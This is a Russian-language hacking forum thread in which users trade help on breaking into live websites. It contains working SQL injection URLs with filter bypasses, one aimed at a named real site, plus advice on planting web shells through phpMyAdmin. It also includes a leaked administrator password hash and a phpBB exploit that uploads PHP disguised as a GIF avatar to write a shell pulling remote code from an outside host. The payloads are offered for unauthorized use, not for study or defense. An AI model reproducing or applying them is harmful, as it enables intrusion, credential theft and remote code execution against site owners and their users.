Спасибо, конечно, что такое Ddos я имею представления. Меня интересует другое, каким образом сканер проводит данную Dos атаку как она реализуется, как мне повторить её с одной тачки ведь сканирования шло тоже с одной машины, а результат был получен такой (компьютер сейчас находится в стадии перезагрузки).
Понятно ну а с другим вопросом поможете? Опять же показал всё тот же сканер: найдена уязвимость 80/phpmyadmin/tbl_create.php иду по указанной ссылке и попадаю прямо в phpmyadmin,как мне выдернуть хеши пользователь? Если можно пошагово растолкуйте, пожалуйста.
Если есть доступ к phpmyadmin и есть возможность выполнять запросы + знаешь полный путь к серваку и папку на запись - лучше залить шелл. Как залить - расписано здесь: https://forum.antichat.ru/thread104591.html
Все что могу сказать - фтопку Xspider - в подовляющем большинстве он пи**** как тротцкий, если уж так интересно что он пишет то - google.ru - уязвимость в phpMyAdmin + tbl_create.php, по досу - уязвимость в RDP + DDOS.
Тут БД mysql. В текущей таблице находятся даные о пользователях mysql. Чтобы просмотреть их - нажми "Обзор"
Зашёл в раздел pwweb в таблице pw_users: Username NoN, Password 875e527b6de108747f61decbd553947e:zHoPeRWthe816pjgR... Usertype Super Administrator Какой тип хеша используется?
Привет У меня всего 2 раза был опыт MS SQL inj И тут решил спонить старое нашёл инъекцию Code: http://site.ru/index.php?name=Links' далее довёл до ума Code: http://site.ru/index.php?name=Links'))-- \Потом начал крутить таблицы Code: http://site.ru/index.php?name=Links'))+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES)-- получил 1 табличку audit и решил проверить что ниже Code: http://site.ru/index.php?name=Links'))+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('audit'))-- На что меня послали куда подальше Code: message: Incorrect syntax near 'audit\'. видно что он скобку экранировал...(пробовал " ' `) Как можно это обойти? Попробовал в хексе но написал еррор Code: message: Conversion failed when converting the nvarchar value 'audit' to data type int.
http://site.ru/index.php?name=Links'))+or+1=(SELECT+TOP+1+TABLE_N AME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAM E+NOT+IN+(SELECT+TOP+Х+TABLE_N AME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAM E))-- Х меняешь от одного вверх
Code: message: An expression of non-boolean type specified in a context where a condition is expected, near ')'.
http://site.ru/index.php?name=Links'))+or+1=(SELECT+TOP+1+TABLE_N AME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAM E+NOT+IN+(SELECT+TOP+Х+TABLE_N AME+FROM+INFORMATION_SCHEMA.TABLES))-- сорри ,невнимательность. но мог бы и сам догадаться.
Code: _http://site.ru/index.php?name=Links'))+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+(char(97)%2Bchar(117)%2Bchar(100)%2Bchar(105)%2Bchar(116)))-- еще можно попробовать having заюзать.. http://forum.antichat.ru/showpost.php?p=445214&postcount=23
Возникла проблема... Пробую залить шелл в phpbb! есть права админа... пробую этот способ: ... 6) Загрузка аваторы с php кодом, а затем инклюд.(Нужны права админа) Бага тоже очень распространненая, тока почему то ее, мало юзают. Создаем файл kiborg.txt, пишем в него Code: <? $file= fopen('shell.php', 'w'); fwrite($file, '<? @include("http://kiborg.h10.ru/shell/sim.txt"); ?>'); fclose($file); ?> Меняем имя файла на kiborg.gif и загружаем его на форум. Заходим в профайл убеждаемся что аватора загрузилась и смотрим ее имя с путем, будет примерно следующее /images/avatars/49624519384cd7deb.gif Создаем файл 1.sql с содержимым Code: UPDATE phpbb_config SET config_value=CONCAT('english/../../images/avatars/49624519384cd7deb.gif',CHAR(0)) where config_name='default_lang'; Ну если с мозгами все в порядке, то поймете что здесь накалякано. Востанавливаем через бд. Ползем по ссылке http://localhost/phpbb13/faq.php И если вы все сделали правильно, то по адрессу http://localhost/phpbb13/shell.php должен быть ваш шелл. Делаю всё как написано, но когда загружаю аватар выдаёт ошибку..(( Подскажите в чём проблема...
.:[melkiy]:., попробуй файлик залить на хост, а потом грузить на форум удаленно, не со своего компа. У меня была такая ситуация. Byrger, дальше после NOT IN свою колонку вставляешь. Почитай статьи о MsSQL инъекциях.
уже в какой раз возникает одна и та же проблема, а именно в подборе имени таблицы, если база не показывает сразу все названия, а использовать limit 1,1 слишком долго...подскажитекак сделать это побыстрее (для начала пусть в 5-ой версии), а также, как определить, включены мэджики или нет, надо ли переводить в хекс или нет, воти лин для примера: http://www.brainnet.org.au/brainnet/publications/pubs_abstract.jsp?PubID=-1+union+select+1,2,table_NAME,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+FROM+INFORMATION_SCHEMA.tables
http://www.brainnet.org.au./brainnet/publications/pubs_abstract.jsp?PubID=-1+union+select+1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+information_schema.tables+group+by+table_schema+limit+0,1 http://www.brainnet.org.au./brainnet/publications/pubs_abstract.jsp?PubID=-1+union+select+1,2,'test',4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 если есть слово test то off если ошибка то on
